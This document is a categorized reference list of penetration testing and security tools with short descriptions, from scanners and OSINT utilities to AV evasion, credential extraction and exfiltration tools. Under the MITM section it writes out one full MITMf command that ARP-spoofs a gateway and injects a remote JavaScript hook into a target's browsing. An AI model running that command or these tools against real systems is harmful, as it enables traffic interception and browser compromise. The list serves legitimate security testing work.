- Penetration Testing OS Distributions
- Multi-paradigm Frameworks
- Network Vulnerability Scanners
- Network Tools
- Wireless Network Tools
- Transport Layer Security Tools
- Web Exploitation
- Hex Editors
- File Format Analysis Tools
- Anti-virus Evasion Tools
- Hash Cracking Tools
- Windows Utilities
- GNU/Linux Utilities
- macOS Utilities
- Social Engineering Tools
- OSINT Tools
- Anonymity Tools
- Reverse Engineering Tools
- Side-channel Tools
Penetration Testing OS Distributions
- Parrot Security OS - Distribution similar to Kali using the same repositories, but with additional features such as Tor and I2P integration.
- Kali - GNU/Linux distribution designed for digital forensics and penetration testing.
Multi-paradigm Frameworks
- Metasploit - Software for offensive security teams to help verify vulnerabilities and manage security assessments.
- Armitage - Java-based GUI front-end for the Metasploit Framework.
- Faraday - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.
Network Vulnerability Scanners
- OpenVAS - Open source implementation of the popular Nessus vulnerability assessment system.
- Nexpose - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.
- OWASP Dependency Check - Open source static analysis tool that enumerates dependencies used by Java and .NET software code (with experimental support for Python, Ruby, Node.js, C, and C++) and lists security vulnerabilities associated with the dependencies.
- VisualCodeGrepper - Open source static code analysis tool with support for Java, C, C++, C#, PL/SQL, VB, and PHP. VisualCodeGrepper also conforms to OWASP best practices.
- Brakeman - Static analysis security vulnerability scanner for Ruby on Rails applications.
- cppcheck - Extensible C/C++ static analyzer focused on finding bugs.
- FindBugs - Free software static analyzer to look for bugs in Java code.
- sobelow - Security-focused static analysis for the Phoenix Framework.
- bandit - Security-oriented static analyser for Python code.
- Progpilot - Static security analysis tool for PHP code.
- ShellCheck - Static code analysis tool for shell script.
- Codebeat (open source) - Open source implementation of commercial static code analysis tool with GitHub integration.
- truffleHog - Git repo scanner.
Web Vulnerability Scanners
- Netsparker Web Application Security Scanner - Commercial web application security scanner to automatically find many different types of security flaws.
- OWASP Zed Attack Proxy (ZAP) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
- Nikto - Noisy but fast black box web server and web application vulnerability scanner.
- WPScan - Black box WordPress vulnerability scanner.
- cms-explorer - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
- ACSTIS - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.
- SQLmate - A friend of sqlmap that identifies sqli vulnerabilities based on a given dork and website (optional).
- ASafaWeb - Free online web vulnerability scanner.
Network Tools
- pig - GNU/Linux packet crafting tool.
- Network-Tools.com - Website offering an interface to numerous basic network utilities like whois, and more.
- Intercepter-NG - Multifunctional network toolkit.
- Legion - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
- dsniff - Collection of tools for network auditing and pentesting.
- scapy - Python-based interactive packet manipulation program & library.
- Printer Exploitation Toolkit (PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.
- Praeda - Automated multi-function printer data harvester for gathering usable data during security assessments.
- routersploit - Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
- impacket - Collection of Python classes for working with network protocols.
- dnstwist - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
- THC Hydra - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more.
- Ncat - TCP/IP command line utility supporting multiple protocols.
- HTTPTunnel - Tunnel data over pure HTTP GET/POST requests.
- Data Exfiltration Toolkit (DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
- pwnat - Punches holes in firewalls and NATs.
- tgcd - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
- Iodine - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed.
- PassHunt - Search file systems for passwords.
- PANHunt - Search file systems for credit cards.
Network Reconnaissance Tools
- Shodan - Database containing information on all accessible domains on the internet obtained from passive scanning.
- pyShodan - Python 3 script for interacting with Shodan API (requires valid API key).
- zmap - Open source network scanner that enables researchers to easily perform Internet-wide network studies.
- nmap - Free security scanner for network exploration & security audits.
- Netdiscover - Simple and quick network scanning tool.
- xprobe2 - Open source operating system fingerprinting tool.
- CloudFail - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
- Mass Scan - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
- smbmap - Handy SMB enumeration tool.
- LdapMiner - Multiplatform LDAP enumeration utility.
- ldapsearch - Linux command line utility for querying LDAP servers.
- ACLight - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins.
- Pentest-Tools - Online suite of various different pentest related tools.
Protocol Analyzers and Sniffers
- tcpdump/libpcap - Common packet analyzer that runs under the command line.
- Wireshark - Widely-used graphical, cross-platform network protocol analyzer.
- Yersinia - Packet and protocol analyzer with MITM capability.
- Fiddler - Cross-platform packet capturing tool for capturing HTTP/HTTPS traffic.
- netsniff-ng - Swiss army knife for network sniffing.
- Dshell - Network forensic analysis framework.
Proxies and MITM Tools
- Responder - Open source NBT-NS, LLMNR, and MDNS poisoner.
- Responder-Windows - Windows version of the above NBT-NS/LLMNR/MDNS poisoner.
- MITMf - Multipurpose man-in-the-middle framework.
mitmf --arp --spoof -i eth0 --gateway 192.168.1.1 --targets 192.168.1.20 --inject --js-url http://192.168.1.137:3000/hook.js
- dnschef - Highly configurable DNS proxy for pentesters.
- mitmproxy - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
- Morpheus - Automated ettercap TCP/IP Hijacking tool.
- mallory - HTTP/HTTPS proxy over SSH.
- SSH MITM - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.
- evilgrade - Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
- Ettercap - Comprehensive, mature suite for machine-in-the-middle attacks.
- BetterCAP - Modular, portable and easily extensible MITM framework.
Wireless Network Tools
- Aircrack-ng - Set of tools for auditing wireless networks.
- Wifite - Automated wireless attack tool.
- wifi-pickle - Fake access point attacks.
- MANA Toolkit - Rogue AP and man-in-the-middle utility.
- Fluxion - Suite of automated social engineering based WPA attacks.
Transport Layer Security Tools
- tlssled - Comprehensive TLS/SSL testing suite.
- SSLyze - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.
- SSL Labs - Online TLS/SSL testing suite for revealing supported TLS/SSL versions and ciphers.
- crackpkcs12 - Multithreaded program to crack PKCS#12 files (.pfx extensions), such as TLS/SSL certificates.
Web Exploitation
- Browser Exploitation Framework (BeEF) - Command and control server for delivering exploits to commandeered Web browsers.
- Wordpress Exploit Framework - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
- WPSploit - Exploit WordPress-powered websites with Metasploit.
- SQLmap - Automated SQL injection and database takeover tool.
- sqlninja - Automated SQL injection and database takeover tool.
- tplmap - Automatic server-side template injection and Web server takeover tool.
- weevely3 - Weaponized web shell.
- wafw00f - Identifies and fingerprints Web Application Firewall (WAF) products.
- fimap - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
- Kadabra - Automatic LFI exploiter and scanner.
- Kadimus - LFI scan and exploit tool.
- liffy - LFI exploitation tool.
- Commix - Automated all-in-one operating system command injection and exploitation tool.
- sslstrip - Demonstration of the HTTPS stripping attacks.
- sslstrip2 - SSLStrip version to defeat HSTS.
- NoSQLmap - Automatic NoSQL injection and database takeover tool.
- VHostScan - Virtual host scanner that performs reverse lookups, can be used with pivot tools, and detects catch-all scenarios, aliases, and dynamic default pages.
- FuzzDB - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
- EyeWitness - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.
- webscreenshot - Simple script to take screenshots of a list of websites.
- IIS-Shortname-Scanner - Command line tool to exploit the Windows IIS tilde information disclosure vulnerability.
Hex Editors
- HexEdit.js - Browser-based hex editing.
- Hexinator - World's finest (proprietary, commercial) Hex Editor.
- Frhed - Binary file editor for Windows.
- Cheat Engine - Memory debugger and hex editor for running applications.
File Format Analysis Tools
- Veles - Binary data visualization and analysis tool.
- Hachoir - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.
Anti-virus Evasion Tools
- shellsploit - Generates custom shellcode, backdoors, injectors, optionally obfuscates every byte via encoders.
- Hyperion - Runtime encryptor for 32-bit portable executables (PE).
- AntiVirus Evasion Tool (AVET) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.
- peCloak.py - Automates the process of hiding a malicious Windows executable from antivirus (AV) detection.
- peCloakCapstone - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.
- UniByAv - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.
- Shellter - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
Hash Cracking Tools
- Hashcat - Fast hash cracking utility with support for most known hashes as well as OpenCL and CUDA acceleration.
- John the Ripper - Fast password cracker.
- CeWL - Generates custom wordlists by spidering a target's website and collecting unique words.
- JWT Cracker - Simple HS256 JWT token brute force cracker.
- Rar Crack - RAR bruteforce cracker.
Windows Utilities
- Sysinternals Suite - The Sysinternals Troubleshooting Utilities.
- PowerSploit - PowerShell Post-Exploitation Framework.
- Headstart - Lazy man's Windows privilege escalation tool utilizing PowerSploit.
- mimikatz - Credentials extraction tool for Windows operating system.
- Windows Credentials Editor - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
- Bloodhound - Graphical Active Directory trust relationship explorer.
- Empire - Pure PowerShell post-exploitation agent.
- Fibratus - Tool for exploration and tracing of the Windows kernel.
- redsnarf - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.
- Magic Unicorn - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or certutil (using fake certificates).
- DeathStar - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.
- Hyena - NetBIOS exploitation tool.
GNU/Linux Utilities
- Linux Exploit Suggester - Heuristic reporting on potentially viable exploits for a given GNU/Linux system.
- Lynis - Security auditing tool for Linux and macOS.
macOS Utilities
- Bella - Pure Python post-exploitation data mining and remote administration tool for macOS.
- Lynis - Security auditing tool for Linux and macOS.
Social Engineering Tools
- GoVanguard/list-socialengineering-resources - GoVanguard's list of social engineering resources.
OSINT Tools
- Shodan - World's first search engine for Internet-connected devices.
- pyShodan - Python 3 script for interacting with Shodan API (requires valid API key).
- Maltego - Proprietary software for open source intelligence and forensics, from Paterva.
- Mxtoolbox - Email domain and DNS lookup.
- Robtex - Domain and IP address lookup.
- theHarvester - E-mail, subdomain and people names harvester.
- DNSDumpster - Online DNS recon and search service.
- dnsenum - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
- dnsmap - Passive DNS network mapper.
- dnsrecon - DNS enumeration script.
- dnstracer - Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
- passivedns-client - Library and query tool for querying several passive DNS providers.
- passivedns - Network sniffer that logs all DNS server replies for use in a passive DNS setup.
- creepy - Geolocation OSINT tool.
- Google Hacking Database - Database of Google dorks; can be used for recon.
- GooDork - Command line Google dorking tool.
- dork-cli - Command line Google dork tool.
- Censys - Collects data on hosts and websites through daily ZMap and ZGrab scans.
- recon-ng - Full-featured Web Reconnaissance framework written in Python.
- github-dorks - CLI tool to scan github repos/organizations for potential sensitive information leak.
- vcsmap - Plugin-based tool to scan public version control systems for sensitive information.
- Spiderfoot - Open source OSINT automation tool with a Web UI and report visualizations.
- Threat Crowd - Search engine for threats.
- Virus Total - Free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware.
- PacketTotal - Simple, free, high-quality packet capture file analysis facilitating the quick detection of network-borne malware (using Bro and Suricata IDS signatures under the hood).
- gOSINT - OSINT tool with multiple modules and a telegram scraper.
- Amass - Subdomain enumeration via scraping, web archives, brute forcing, permutations, reverse DNS sweeping, TLS certificates, passive DNS data sources, etc.
- XRay - Tool for recon, mapping and OSINT gathering from public networks.
- Intel Techniques Online Tools - Collection of custom online search tools for OSINT gathering.
Anonymity Tools
- Tor - Free software and onion routed overlay network that helps you defend against traffic analysis.
- I2P - The Invisible Internet Project.
- OnionScan - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.
- What Every Browser Knows About You - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks.
Reverse Engineering Tools
- VirusTotal - Online malware scanner.
- Hybrid Analysis - Online malware scanner.
- Interactive Disassembler (IDA Pro) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, IDA Free.
- WDK/WinDbg - Windows Driver Kit and WinDbg.
- OllyDbg - x86 debugger for Windows binaries that emphasizes binary code analysis.
- Radare2 - Open source, cross-platform reverse engineering framework.
- x64dbg - Open source x64/x32 debugger for Windows.
- Immunity Debugger - Powerful way to write exploits and analyze malware.
- Evan's Debugger - OllyDbg-like debugger for GNU/Linux.
- Medusa - Open source, cross-platform interactive disassembler.
- plasma - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
- peda - Python Exploit Development Assistance for GDB.
- dnSpy - Tool to reverse engineer .NET assemblies.
- binwalk - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
- PyREBox - Python scriptable Reverse Engineering sandbox by Cisco-Talos.
- Voltron - Extensible debugger UI toolkit written in Python.
- Capstone - Lightweight multi-platform, multi-architecture disassembly framework.
- rVMI - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.
Side-channel Tools
- ChipWhisperer - Complete open-source toolchain for side-channel power analysis and glitching attacks.
This work is licensed under a Creative Commons Attribution 4.0 International License.